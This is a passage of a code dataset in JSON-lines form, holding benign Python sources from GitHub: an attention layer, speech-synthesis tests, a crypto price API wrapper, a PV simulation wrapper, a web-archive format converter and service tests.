self.Wk(K)\n V = self.Wv(V)\n\n Q = self.split_heads(Q, batch_size)\n K = self.split_heads(K, batch_size)\n V = self.split_heads(V, batch_size)\n\n scaled_attention, weights = sdp_attention(Q, K, V, mask)\n\n scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3])\n\n concat_attention = tf.reshape(scaled_attention,\n (batch_size, -1, self.dm))\n\n return self.linear(tf.reshape(scaled_attention,\n (batch_size, -1, self.dm))), 
weights\n","repo_name":"s0m35h1t/holbertonschool-machine_learning","sub_path":"supervised_learning/0x11-attention/6-multihead_attention.py","file_name":"6-multihead_attention.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24390834310","text":"import sys\n\n\nPY2 = sys.version_info[0] == 2\n\n\nif PY2:\n text_type = unicode\n binary_type = str\n string_types = basestring,\n unicode = unicode\n basestring = basestring\nelse:\n text_type = str\n binary_type = bytes\n string_types = str,\n unicode = str\n basestring = (str, bytes)\n","repo_name":"vitalk/flask-styleguide-example","sub_path":"app/compat.py","file_name":"compat.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"28640942713","text":"import unittest\nimport logging\nfrom io import StringIO, BytesIO\nimport wave\n\nfrom espeakng import ESpeakNG\n\nG2P_TESTS = [\n (u\"GELBSEIDENEN\", u\"dZ'ElbseId,En@n\", u\"d͡ʒˈɛlbse͡ɪdˌɛnən\"),\n (u\"UNMUTE\", u\"Vnmj'u:t\", u\"ʌnmjˈuːt\"),\n (u\"GESCHIRRSCHEUERN\", u\"dZ'Esk3r-@Sj,u:3n\", u\"d͡ʒˈɛskɚɹəʃjˌuːɚn\"),\n (u\"DÜSTRE\", u\"d'u:st3\", u\"dˈuːstɚ\"),\n (u\"EINGANGE\", u\"'aINgandZ\", u\"ˈa͡ɪŋɡænd͡ʒ\"),\n (u\"AUSSCHLÄGEN\", u\"'O:SlEdZ@n\", u\"ˈɔːʃlɛd͡ʒən\"),\n (u\"NACHHÄNGEND\", u\"n'atSh@ndZ,End\", u\"nˈæt͡ʃhənd͡ʒˌɛnd\"),\n (u\"HAUPTSTRAßEN\", u\"h'O:ptst3r- 'as 'En\", u\"hˈɔːptstɚɹ ˈæs ˈɛn\"),\n (u\"HOCHWEISEN\", u\"h'0tSwaIz@n\", u\"hˈɑːt͡ʃwa͡ɪzən\"),\n (u\"DICKER\", u\"d'Ik3\", u\"dˈɪkɚ\"),\n ]\n\nclass TestESpeakNG (unittest.TestCase):\n\n def test_say_unkown_voice(self):\n\n esng = ESpeakNG(voice='unknown-voice')\n esng.pitch = 32\n esng.speed = 150\n res = esng.say('Hello World!', sync=True)\n\n self.assertNotEqual (res, [])\n\n\n def test_say_en(self):\n\n esng = ESpeakNG(voice='english-us')\n esng.pitch = 32\n esng.speed = 150\n res = esng.say('Hello World!', sync=True)\n\n self.assertEqual (res, [])\n\n def test_say_de(self):\n\n esng = ESpeakNG(voice='german')\n esng.pitch = 32\n esng.speed = 150\n esng.say('Wie geht es Dir?', sync=True)\n\n def test_voices(self):\n esng = ESpeakNG()\n\n voices = esng.voices\n self.assertGreater (len(voices), 10)\n\n def test_synth_wav(self):\n\n esng = ESpeakNG(voice='english-us')\n esng.pitch = 32\n esng.speed = 150\n wavs = esng.synth_wav('Hello World!')\n wav = wave.open(BytesIO(wavs))\n \n self.assertEqual (wav.getnchannels(), 1)\n self.assertEqual (wav.getframerate(), 22050)\n self.assertGreater (wav.getnframes(), 24000)\n\n def test_synth_wav_xsampa(self):\n\n esng = ESpeakNG(voice='english-us')\n esng.pitch = 32\n esng.speed = 150\n wavs = esng.synth_wav(\"h@l'oU\", fmt='xs')\n wav = wave.open(BytesIO(wavs))\n \n self.assertEqual (wav.getnchannels(), 1)\n self.assertEqual (wav.getframerate(), 22050)\n self.assertGreater (wav.getnframes(), 20000)\n\n def test_g2p(self):\n esng = ESpeakNG(voice='english-us')\n\n for g, xs_t, ipa_t in G2P_TESTS:\n\n xs = esng.g2p (g)\n self.assertEqual(xs, xs_t)\n\n ipa = esng.g2p (g, ipa=2)\n self.assertEqual(ipa, ipa_t)\n\nif __name__ == \"__main__\":\n\n logging.basicConfig(level=logging.ERROR)\n # logging.basicConfig(level=logging.DEBUG)\n\n 
unittest.main()\n\n","repo_name":"gooofy/py-espeak-ng","sub_path":"tests/test_espeakng.py","file_name":"test_espeakng.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"66"} +{"seq_id":"192425455","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"profiles\", \"0001_initial\"),\n ]\n\n operations = [\n migrations.AddField(\n model_name=\"profile\",\n name=\"avatar\",\n field=models.ImageField(upload_to=\"profiles\", blank=True, null=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"tutuca/potaje","sub_path":"profiles/migrations/0002_profile_avatar.py","file_name":"0002_profile_avatar.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"2301065265","text":"import requests\nimport sys\n\nurl = \"http://localhost:5000/get_translation\"\n\nSENTENCE_TO_TRANSLATE = sys.argv[1]\n\npayload=\"{\\n \\\"sentence\\\": \\\"%s\\\"\\n}\" % SENTENCE_TO_TRANSLATE\nheaders = {\n 'Content-Type': 'application/json'\n}\n\nresponse = requests.request(\"POST\", url, headers=headers, data=payload)\n\nprint(response.text)\n","repo_name":"tgdev24/dockerSample","sub_path":"client_script.py","file_name":"client_script.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43515862748","text":"import json\nimport requests\n\nclass CryptoApi(object):\n\n def __init__(self):\n self._api_url = 'https://api.coingecko.com/api/v3/coins/{0}?localization=false&tickers=false&community_data=false&developer_data=false&sparkline=false%22'\n self._coindesk_api_url = 'https://api.coindesk.com/v1/bpi/historical/close.json?start={0}&end={1}'\n\n def get_crypto_price(self, name_crypto, name_currency):\n url = self._api_url.format(name_crypto)\n \n try:\n response = requests.get(url)\n response.raise_for_status()\n data = json.loads(response.text)\n price = data['market_data']['current_price'][name_currency]\n\n return f'1 {name_crypto} = {price} {name_currency}'\n\n except requests.HTTPError:\n return f'Sorry, that cryptocurrency doesn\\'t exist or i dont have info about it :('\n\n except KeyError:\n return f'Sorry, i didn\\'t foud {name_crypto}\\'s price in {name_currency} :('\n\n def convert_to_crypto(self, name_currency, name_crypto, amount):\n url = self._api_url.format(name_crypto)\n \n try:\n response = requests.get(url)\n response.raise_for_status()\n data = json.loads(response.text)\n price = data['market_data']['current_price'][name_currency]\n converted_value = (amount/price)\n \n return f'{amount} {name_currency} = {converted_value} {name_crypto}'\n \n except requests.HTTPError:\n return f'Sorry, that cryptocurrency doesn\\'t exist or i dont have info about it :('\n\n except KeyError:\n return f'Sorry, i coudn\\'t convert {name_currency} to {name_crypto}. 
Try with another currency :('\n\n def convert_from_crypto(self, name_crypto, name_currency, amount):\n url = self._api_url.format(name_crypto)\n \n try:\n response = requests.get(url)\n response.raise_for_status()\n data = json.loads(response.text)\n price = data['market_data']['current_price'][name_currency]\n converted_value = (amount * price)\n \n return f'{amount} {name_crypto} = {converted_value} {name_currency}'\n \n except requests.HTTPError:\n return f'Sorry, that cryptocurrency doesn\\'t exist or i dont have info about it :('\n\n except KeyError:\n return f'Sorry, i coudn\\'t convert {name_crypto} to {name_currency}. Try with another currency :('\n\n def get_historical_price(self, date):\n url = self._coindesk_api_url.format(date, date)\n\n try:\n response = requests.get(url)\n response.raise_for_status()\n data = json.loads(response.text)\n price = data['bpi'][date]\n disclaimer = data['disclaimer']\n \n return f'Bitcoin price on {date} = {price} usd \\n{disclaimer}'\n\n except requests.HTTPError:\n return f'Sorry, i couldn\\'t find Bitcoin price on that date.'\n\n\n","repo_name":"Sgewux/discord_bot","sub_path":"cogs/bot_utilities/crypto_api.py","file_name":"crypto_api.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"36817733096","text":"import numpy as np\nimport pandas as pd\n\nfrom .Alternative import Alternative\nfrom .Category import Category\nfrom .Criterion import Criterion\nfrom .CriterionTri import CriterionTri\nfrom .ImpactMatrix import ImpactMatrix\nfrom .ImpactMatrixTri import ImpactMatrixTri\nfrom .Profile import Profile\nfrom .ProfileMatrix import ProfileMatrix\n\n\ndef create_impact_matrix_from_csv(filename_matrix,\n filename_criterion_data,\n filename_matrix_index_col: str = 'A',\n filename_criterion_data_index_col: str = 'I'):\n matrix = pd.read_csv(filename_matrix, index_col=filename_matrix_index_col)\n cri_information = pd.read_csv(filename_criterion_data, index_col=filename_criterion_data_index_col)\n\n raw_data = matrix.to_numpy()\n\n alt_names = matrix.index.values\n alternatives = [Alternative(a) for a in alt_names]\n criterions = [create_criterion(col, cri_information[col]) for col in matrix.columns]\n\n impact_matrix = ImpactMatrix(np.array(alternatives),\n np.array(criterions),\n raw_data)\n\n return impact_matrix\n\n\ndef create_tri_data(filename_matrix,\n filename_criterion_data,\n filename_b_data,\n filename_q_data,\n filename_p_data,\n filename_v_data,\n filename_matrix_index_col: str = 'A',\n filename_criterion_data_index_col: str = 'I',\n filename_b_data_col: str = 'C'):\n p = pd.read_csv(filename_p_data)\n q = pd.read_csv(filename_q_data)\n v = pd.read_csv(filename_v_data)\n matrix = pd.read_csv(filename_matrix, index_col=filename_matrix_index_col)\n cri_information = pd.read_csv(filename_criterion_data, index_col=filename_criterion_data_index_col)\n b = pd.read_csv(filename_b_data, index_col=filename_b_data_col)\n\n raw_data = matrix.to_numpy()\n\n alt_names = matrix.index.values\n alternatives = [Alternative(a) for a in alt_names]\n criterions = [create_tri_criterion(col,\n cri_information[col],\n q[col].values[0],\n p[col].values[0],\n v[col].values[0]) for col in b.index.values]\n\n impact_matrix = ImpactMatrixTri(alternatives, criterions, raw_data)\n\n raw_data_b = b.to_numpy()\n\n pro_names = b.columns\n profiles = [Profile(p) for p in pro_names]\n categories = [Category(pro_names[i].split('-')[0])\n if i < len(pro_names) else 
Category(pro_names[i - 1].split('-')[1])\n for i in range(len(pro_names) + 1)]\n\n criterions = [create_tri_criterion(col,\n cri_information[col],\n q[col].values[0],\n p[col].values[0],\n v[col].values[0]) for col in b.index.values]\n\n profile_matrix = ProfileMatrix(profiles, criterions, categories, raw_data_b)\n\n return impact_matrix, profile_matrix\n\n\ndef create_tri_criterion(name, cri_info, q, p, v):\n ascending = eval(str(cri_info[\"ascending\"]))\n criterion_type = cri_info[\"criterion_type\"]\n cri = CriterionTri(name, q, p, v, ascending, criterion_type)\n return cri\n\n\ndef create_criterion(name, cri_info):\n ascending = eval(str(cri_info[\"ascending\"]))\n criterion_type = cri_info[\"criterion_type\"]\n cri = Criterion(name, ascending, criterion_type)\n return cri\n","repo_name":"Z-Rna/psmaa-app","sub_path":"services/backend/psmaa/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22916598498","text":"# -*- encoding: utf-8 -*-\n'''\n Datafile import template for the CCMS system.\n'''\n## General settings for the file\ngeneral={\n\t 'name': 'CCMS',\n ## A list of leading characters which will not be used for data lines.\n 'comments': ['#'],\n 'split string': None, \n 'sample': '', \n 'short info': '', \n }\n## Defining the file header\nheader={\n 'length': 1, \n }\n## Defining the data columns\ncolumns={\n 'from header': (0, None, None, None),\n 'header column splitting': (\"\", '_(', \")'\"), \n ## Define columns to use for x,y,z and error column.\n 'plot columns': {\n 'x': [],#'T_sample'], \n 'y': ['moment'], \n #'z': [], \n 'error': []\n }, \n }\n## Defining sequence splitting\nsplitting={\n 'use empty': True, \n }\n## Defining the file footer, if nothing is specified there will be no footer\nfooter={\n }\n## Define how the applicability of thes template can be checked\ntype_info={\n 'wildcards': ['*.dat'],\n # Not jet implemented\n }\n\n#------------------------------------ End of Template settings -----------------------------------","repo_name":"aglavic/plotpy","sub_path":"plot_script/config/default_templates/ccms.py","file_name":"ccms.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17507016716","text":"import argparse\nimport logging\nimport os\nimport os.path\nimport datetime\nimport rsgislib\n\nimport eodatadown.eodatadownrun\n\nfrom eodatadown import EODATADOWN_SENSORS_LIST\n\nlogger = logging.getLogger('eoddcreatereport.py')\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\", \"--config\", type=str, default=\"\", help=\"Path to the JSON config file.\")\n parser.add_argument(\"-o\", \"--output\", type=str, required=True, help=\"The output PDF report file.\")\n parser.add_argument(\"--start\", type=str, required=True, help=\"The start date (recent), with format YYYYMMDD.\")\n parser.add_argument(\"--end\", type=str, required=True, help=\"The start date (earliest), with format YYYYMMDD.\")\n parser.add_argument(\"-s\", \"--sensor\", type=str, required=False, choices=EODATADOWN_SENSORS_LIST,\n help='''Specify the sensor for which this process should be executed (Optional)''')\n parser.add_argument(\"-p\", \"--platform\", type=str, required=False,\n help='''Specify the platform for which this process should be executed (Optional)''')\n parser.add_argument(\"--order_desc\", 
action='store_true', default=False,\n help=\"Specify that the scenes should be in descending order.\")\n parser.add_argument(\"--record_db\", action='store_true', default=False,\n help=\"Specify that the report should be stored in database.\")\n\n args = parser.parse_args()\n\n config_file = args.config\n main_config_value = os.getenv('EDD_MAIN_CFG', None)\n if (config_file == '') and (main_config_value is not None):\n config_file = main_config_value\n\n print(\"'\" + config_file + \"'\")\n\n if not os.path.exists(config_file):\n logger.info(\"The config file does not exist: '\" + config_file + \"'\")\n raise Exception(\"Config file does not exist\")\n\n t = rsgislib.RSGISTime()\n t.start(True)\n\n start_date = datetime.datetime.strptime(args.start, '%Y%m%d').date()\n end_date = datetime.datetime.strptime(args.end, '%Y%m%d').date()\n\n eodatadown.eodatadownrun.create_date_report(config_file, args.output, start_date, end_date, args.sensor,\n args.platform, args.order_desc, args.record_db)\n\n t.end(reportDiff=True, preceedStr='EODataDown processing completed ', postStr=' - eoddcreatereport.py.')\n\n","repo_name":"remotesensinginfo/eodatadown","sub_path":"bin/eoddcreatereport.py","file_name":"eoddcreatereport.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"6749243889","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 29 17:47:46 2017\n\n@author: Gerrit\n\"\"\"\n\nimport numpy as np\nimport site #import additional module for SAM simulation\nsite.addsitedir('S:\\Gerrits_Documents\\Renewable Profile Creation\\PV\\sdk-release\\languages\\python') # Use site.addsitedir() to set the path to the SAM SDK API. Set path to the python directory.\nimport sscapi # can only import this after directory is added to site module on where to find it\n\nclass PVSystem:\n \"\"\"\n Class that holds NREL Software Simulation Core objects and data containers\n Uses SAM's Software Development Kit (SDK)\n Allows you to run PVWatts in python\n \"\"\"\n def __init__(self,\n weather_dataframe, # weather data from NSRDB (pd.DataFrame)\n weather_meta_data, # meta data for the weather data file above (pd.DataFrame)\n system_capacity_dc = 1, # DC system capacity (kW or MW)\n dc_ac_ratio = 1.1, # Set DC/AC ratio (or inverter loading ratio). 
See https://sam.nrel.gov/sites/default/files/content/virtual_conf_july_2013/07-sam-virtual-conference-2013-woodcock.pdf\n tilt = 0, # tilt of system in degrees (0 = horizontal)\n azimuth = 180, # azimuth angle (in degrees) from north (180 = south facing)\n inv_eff = 96, # inverter efficiency in percent\n losses = 14.0757, # system losses in percent (soiling, shading, wiring, etc.)\n array_type = 0, # specify fixed tilt system (0=Fixed, 1=Fixed Roof, 2=1 Axis Tracker, 3=Backtracted, 4=2 Axis Tracker)\n gcr = 0.4, # ground coverage ratio\n adjust_constant = 0 # constant loss adjustment\n ):\n \n # Set up Software Simulation Core (SSC) Object\n ssc = sscapi.PySSC()\n\n # Set Up Data Containers\n dat = ssc.data_create() # container for all input data\n wfd = ssc.data_create() # weather file data container\n \n # Fill wfd container with weather data\n ssc.data_set_number(wfd, 'lat', weather_meta_data['Latitude'])\n ssc.data_set_number(wfd, 'lon', weather_meta_data['Longitude'])\n ssc.data_set_number(wfd, 'tz', weather_meta_data['Local Time Zone'])\n ssc.data_set_number(wfd, 'elev', weather_meta_data['Elevation'])\n ssc.data_set_array(wfd, 'year', weather_dataframe.index.year)\n ssc.data_set_array(wfd, 'month', weather_dataframe.index.month)\n ssc.data_set_array(wfd, 'day', weather_dataframe.index.day)\n ssc.data_set_array(wfd, 'hour', weather_dataframe.index.hour)\n ssc.data_set_array(wfd, 'minute', weather_dataframe.index.minute)\n ssc.data_set_array(wfd, 'dn', weather_dataframe['DNI'])\n ssc.data_set_array(wfd, 'df', weather_dataframe['DHI'])\n ssc.data_set_array(wfd, 'wspd', weather_dataframe['Wind Speed'])\n ssc.data_set_array(wfd, 'tdry', weather_dataframe['Temperature'])\n\n # Add wfd container to dat container\n ssc.data_set_table(dat, 'solar_resource_data', wfd)\n ssc.data_free(wfd)\n\n # Specify the system Configuration\n ssc.data_set_number(dat, 'system_capacity', system_capacity_dc)\n ssc.data_set_number(dat, 'dc_ac_ratio', dc_ac_ratio)\n ssc.data_set_number(dat, 'tilt', tilt)\n ssc.data_set_number(dat, 'azimuth', azimuth)\n ssc.data_set_number(dat, 'inv_eff', inv_eff)\n ssc.data_set_number(dat, 'losses', losses)\n ssc.data_set_number(dat, 'array_type', array_type)\n ssc.data_set_number(dat, 'gcr', gcr)\n ssc.data_set_number(dat, 'adjust:constant', adjust_constant)\n \n # Add the software simulation core object and the input data object as attributes to the PVSystem object\n self.ssc = ssc\n self.dat = dat\n\n def simulate(self):\n \"\"\"\n Simulate PV generation for defined system\n Returns:\n output (np.array): Array of hourly generation in MW (ac)\n \"\"\"\n \n # Create PVWatts module, execute, and save results in dataframe\n mod = self.ssc.module_create('pvwattsv5') # create a pvwatts module (pvwattsv5 is the current version of the module)\n self.ssc.module_exec(mod, self.dat)\n \n return np.array(self.ssc.data_get_array(self.dat, 'gen'))","repo_name":"abdesslemn/Solar_Wind_Shapes","sub_path":"PV/pvsim_sam.py","file_name":"pvsim_sam.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71417400530","text":"import html\nimport os\nimport shutil\nimport time\nimport traceback\nfrom datetime import datetime, timezone\nfrom email.utils import format_datetime\nfrom urllib.parse import quote\n\nfrom ... 
import util\nfrom ..._polyfill import zipfile\nfrom ...util import Info\nfrom ..host import Host\nfrom ..indexer import FavIconCacher, SingleHtmlConverter, UnSingleHtmlConverter\n\n\nclass Converter:\n def __init__(self, input, output, book_items=None, types=None, format=None):\n self.input = input\n self.output = output\n self.book_items = book_items\n self.types = set(types) if types else {}\n self.format = format\n\n def run(self):\n if self.input != self.output:\n yield Info('info', 'Copying files...')\n os.makedirs(self.output, exist_ok=True)\n self._copy_files()\n\n yield Info('info', 'Applying conversion...')\n host = Host(self.output)\n\n for book_id, item_ids in (self.book_items or dict.fromkeys(host.books)).items():\n try:\n book = host.books[book_id]\n except KeyError:\n # skip invalid book ID\n yield Info('warn', f'Skipped invalid book {book_id!r}.')\n continue\n\n yield Info('info', f'Handling book {book_id!r}...')\n book.load_meta_files()\n\n book_meta_orig = book.checksum(book.meta)\n\n for id in (item_ids or book.meta):\n if id not in book.meta:\n # skip invalid item ID\n yield Info('debug', f'Skipped invalid item {id!r}.')\n continue\n\n type = book.meta[id].get('type', '')\n if type not in self.types:\n yield Info('debug', f'Skipped item {id!r}: type={type!r}')\n continue\n\n yield Info('debug', f'Checking {id!r}...')\n\n if self.format:\n try:\n try:\n yield from self._convert_item_format(book, id)\n except OSError as exc:\n raise RuntimeError(exc.strerror) from exc\n except Exception as exc:\n traceback.print_exc()\n yield Info('error', f'Failed to convert {id!r}: {exc}', exc=exc)\n\n # update files\n if book.checksum(book.meta) != book_meta_orig:\n yield Info('info', 'Saving changed meta files...')\n book.save_meta_files()\n\n def _copy_files(self):\n with os.scandir(self.input) as dirs:\n for src in dirs:\n dst = os.path.join(self.output, src.name)\n try:\n shutil.copytree(src, dst)\n except NotADirectoryError:\n shutil.copy2(src, dst)\n\n def _convert_item_format(self, book, id):\n meta = book.meta[id]\n index = meta.get('index')\n\n if not index:\n yield Info('debug', f'Skipped {id!r}: no index')\n return\n\n if index.endswith('/index.html'):\n format = 'folder'\n elif util.is_htz(index):\n format = 'htz'\n elif util.is_maff(index):\n format = 'maff'\n else:\n format = 'single_file'\n\n if format == self.format:\n yield Info('debug', f'Skipped {id!r}: same format')\n return\n\n if format == 'folder':\n indexbase = index[:-11]\n fsrc = os.path.normpath(os.path.join(book.data_dir, indexbase))\n indexdir = os.path.normpath(os.path.join(book.data_dir, indexbase + '.' + util.datetime_to_id()))\n shutil.copytree(fsrc, indexdir)\n yield from self._cache_favicon(book, id)\n elif format == 'htz':\n fsrc = os.path.normpath(os.path.join(book.data_dir, index))\n indexbase = index[:-4]\n indexdir = os.path.normpath(os.path.join(book.data_dir, indexbase + '.' + util.datetime_to_id()))\n util.fs.zip_extract(fsrc, indexdir)\n elif format == 'maff':\n fsrc = os.path.normpath(os.path.join(book.data_dir, index))\n indexbase = index[:-5]\n indexdir = os.path.normpath(os.path.join(book.data_dir, indexbase + '.' 
+ util.datetime_to_id()))\n\n maff_info = next(iter(util.get_maff_pages(fsrc)), None)\n if not maff_info:\n yield Info('debug', f'Skipping {id!r}: no valid index page in MAFF')\n subpath, _, _ = maff_info.indexfilename.partition('/')\n\n util.fs.zip_extract(fsrc, indexdir, subpath)\n\n rdf_file = os.path.join(indexdir, 'index.rdf')\n try:\n os.remove(rdf_file)\n except FileNotFoundError:\n pass\n else:\n fsrc = os.path.normpath(os.path.join(book.data_dir, index))\n indexbase, ext = os.path.splitext(index)\n indexdir = os.path.normpath(os.path.join(book.data_dir, indexbase + '.' + util.datetime_to_id()))\n\n os.makedirs(indexdir)\n indexfile = os.path.join(indexdir, 'index.html')\n if util.is_html(fsrc) and not util.is_xhtml(fsrc):\n mainfile = indexfile\n shutil.copy2(fsrc, mainfile)\n else:\n basename = os.path.basename(index)\n mainfile = os.path.join(indexdir, basename)\n shutil.copy2(fsrc, mainfile)\n with open(indexfile, 'w', encoding='UTF-8', newline='\\n') as fh:\n fh.write(f'')\n\n if util.is_html(mainfile) or util.is_svg(mainfile):\n conv = UnSingleHtmlConverter(mainfile)\n content = conv.run()\n with open(mainfile, 'w', encoding=conv.encoding, newline='') as fh:\n fh.write(content)\n\n shutil.copystat(fsrc, indexfile)\n\n try:\n if self.format == 'folder':\n fdst = os.path.normpath(os.path.join(book.data_dir, indexbase))\n yield Info('info', f'Converting {id!r}: {book.get_subpath(fsrc)!r} => {book.get_subpath(fdst)!r} ...')\n\n if os.path.lexists(fdst):\n yield Info('error', f'Failed to convert {id!r}: target {book.get_subpath(fdst)!r} already exists.')\n return\n\n shutil.move(indexdir, fdst)\n\n # adjust icon path to fit the new index file\n iconfile = book.get_icon_file(meta)\n if iconfile:\n meta['icon'] = util.get_relative_url(iconfile, fdst, path_is_dir=False, start_is_dir=True)\n\n meta['index'] = indexbase + '/index.html'\n\n elif self.format == 'htz':\n fdst = os.path.normpath(os.path.join(book.data_dir, indexbase + '.htz'))\n yield Info('info', f'Converting {id!r}: {book.get_subpath(fsrc)!r} => {book.get_subpath(fdst)!r} ...')\n\n if os.path.lexists(fdst):\n yield Info('error', f'Failed to convert {id!r}: target {book.get_subpath(fdst)!r} already exists.')\n return\n\n util.fs.zip_compress(fdst, indexdir, '')\n shutil.copystat(os.path.join(indexdir, 'index.html'), fdst)\n\n # adjust icon path to fit the new index file\n iconfile = book.get_icon_file(meta)\n if iconfile:\n meta['icon'] = util.get_relative_url(iconfile, fdst, path_is_dir=False, start_is_dir=False)\n\n meta['index'] = indexbase + '.htz'\n\n elif self.format == 'maff':\n fdst = os.path.normpath(os.path.join(book.data_dir, indexbase + '.maff'))\n yield Info('info', f'Converting {id!r}: {book.get_subpath(fsrc)!r} => {book.get_subpath(fdst)!r} ...')\n\n rdf_file = os.path.join(indexdir, 'index.rdf')\n if os.path.lexists(rdf_file):\n yield Info('error', f'Failed to convert {id!r}: index.rdf file already exists.')\n return\n\n if os.path.lexists(fdst):\n yield Info('error', f'Failed to convert {id!r}: target {book.get_subpath(fdst)!r} already exists.')\n return\n\n subpath = id if util.id_to_datetime(id) else util.datetime_to_id()\n util.fs.zip_compress(fdst, indexdir, subpath)\n\n rdf_content = self._generate_index_rdf(book, id)\n with zipfile.ZipFile(fdst, 'a') as zh:\n zh.writestr(\n f'{subpath}/index.rdf', rdf_content,\n **util.fs.zip_compression_params(mimetype='application/rdf+xml')\n )\n\n shutil.copystat(os.path.join(indexdir, 'index.html'), fdst)\n\n # adjust icon path to fit the new index file\n 
iconfile = book.get_icon_file(meta)\n if iconfile:\n meta['icon'] = util.get_relative_url(iconfile, fdst, path_is_dir=False, start_is_dir=False)\n\n meta['index'] = indexbase + '.maff'\n\n elif self.format == 'single_file':\n file = os.path.join(indexdir, 'index.html')\n file = util.get_meta_refreshed_file(file) or file\n\n if util.is_xhtml(file):\n ext = '.xhtml'\n elif util.is_html(file):\n ext = '.html'\n elif util.is_svg(file):\n ext = '.svg'\n else:\n _, ext = os.path.splitext(file)\n\n # special handling to prevent named \"index.html\"\n if indexbase == 'index' and ext == '.html':\n indexbase = 'index_'\n\n fdst = os.path.normpath(os.path.join(book.data_dir, indexbase + ext))\n yield Info('info', f'Converting {id!r}: {book.get_subpath(fsrc)!r} => {book.get_subpath(fdst)!r} ...')\n\n if os.path.lexists(fdst):\n yield Info('error', f'Failed to convert {id!r}: target {book.get_subpath(fdst)!r} already exists.')\n return\n\n if util.is_html(file) or util.is_svg(file):\n conv = SingleHtmlConverter(file)\n content = conv.run()\n with open(fdst, 'w', encoding=conv.encoding, newline='') as fh:\n fh.write(content)\n shutil.copystat(file, fdst)\n else:\n shutil.copy2(file, fdst)\n\n if meta.get('icon'):\n iconfile = book.get_icon_file(meta)\n meta['icon'] = util.get_relative_url(iconfile, fdst, path_is_dir=False, start_is_dir=False)\n meta['index'] = indexbase + ext\n\n try:\n shutil.rmtree(fsrc)\n except NotADirectoryError:\n os.remove(fsrc)\n finally:\n try:\n shutil.rmtree(indexdir)\n except FileNotFoundError:\n pass\n\n def _cache_favicon(self, book, id):\n generator = FavIconCacher(book, cache_archive=True, cache_file=True)\n yield from generator.run([id])\n\n def _generate_index_rdf(self, book, id):\n meta = book.meta[id]\n dt = util.id_to_datetime(meta.get('create', ''))\n dt = dt.astimezone() if dt else datetime.now(timezone.utc)\n return f\"\"\"\\\n\n\n\n \n \n \n \n \n\n\n\"\"\"\n\n\ndef run(input, output, book_items=None, types=None, format=None):\n start = time.time()\n yield Info('info', 'converting items:')\n yield Info('info', f'input directory: {os.path.abspath(input)}')\n yield Info('info', f'output directory: {os.path.abspath(output) if output is not None else \"(in-place)\"}')\n\n if book_items:\n for book_id, item_ids in book_items.items():\n item_ids_text = ', '.join(f'{id!r}' for id in item_ids) if item_ids else 'all'\n yield Info('info', f'book: {book_id!r}, item(s): {item_ids_text}')\n else:\n yield Info('info', 'books: all, items: all')\n\n yield Info('info', f'types: {types}')\n yield Info('info', f'format: {format}')\n yield Info('info', '')\n\n if output is None:\n output = input\n\n try:\n conv = Converter(input, output, book_items=book_items, types=types, format=format)\n yield from conv.run()\n except Exception as exc:\n traceback.print_exc()\n yield Info('critical', str(exc), exc=exc)\n return\n else:\n yield Info('info', 'Done.')\n\n elapsed = time.time() - start\n yield Info('info', f'Time spent: {elapsed} seconds.')\n","repo_name":"danny0838/PyWebScrapBook","sub_path":"webscrapbook/scrapbook/convert/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":13306,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"66"} +{"seq_id":"33608051992","text":"import pytest\n\nfrom tests_cargo_corp import utils\n\n\n@pytest.mark.parametrize(\n 'is_robot_active, cargo_robots_code, expected_code',\n ((True, 200, 200), (True, 404, 404), (False, 200, 404)),\n)\nasync def test_robot_token_info(\n pgsql,\n 
taxi_cargo_corp,\n mockserver,\n is_robot_active,\n cargo_robots_code,\n expected_code,\n):\n external_ref = utils.EXTERNAL_REF_FMT.format(utils.CORP_CLIENT_ID)\n\n @mockserver.json_handler('cargo-robots/v1/robot/token')\n def _handler(request):\n assert request.query['external_ref'] == external_ref\n if cargo_robots_code == 200:\n return {'token': utils.ROBOT_TOKEN}\n return mockserver.make_response(\n status=cargo_robots_code, json=utils.BAD_RESPONSE,\n )\n\n if is_robot_active:\n utils.create_employee(\n pgsql, corp_client_id=utils.CORP_CLIENT_ID, is_robot=True,\n )\n response = await taxi_cargo_corp.post(\n 'v1/client/robot/token/info',\n headers={\n 'X-B2B-Client-Id': utils.CORP_CLIENT_ID,\n 'X-Yandex-Uid': utils.YANDEX_UID,\n },\n )\n assert response.status_code == expected_code\n if expected_code == 200:\n assert response.json() == {\n 'token': utils.ROBOT_TOKEN,\n 'revision': 1,\n 'is_enabled': is_robot_active,\n }\n\n\n@pytest.mark.parametrize(\n 'is_robot_exist, is_robot_enabled, expected_code',\n ((True, True, 200), (True, False, 200), (False, False, 404)),\n)\nasync def 